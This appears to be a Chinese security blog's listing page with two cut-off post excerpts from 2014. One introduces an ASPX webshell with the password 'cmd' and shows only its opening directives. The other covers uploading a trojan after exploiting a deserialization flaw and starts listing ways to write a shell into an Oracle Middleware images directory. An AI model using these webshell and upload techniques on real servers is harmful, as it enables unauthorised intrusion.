0x01 apsx
密码为cmd,仅命令行方式
<%@page language="C#"%>
<%@ import Namespace="System.IO"%>
<%@ import Namespace="System.Xml"%>
&...
Adminxe
10年前 (2014-08-24) 2298℃ 0评论
3喜欢
对于反序列化漏洞,如果获得的是系统权限或者root权限,那就没必要上传木马,但如果只是web安装应用的权限,就上传获取更大权限。
上传需要找到几个点,获取物理路径,如下面三种:
方法1:把shell写到控制台images目录中\Oracle\Middlewa...
Adminxe
10年前 (2014-08-10) 3020℃ 0评论
1喜欢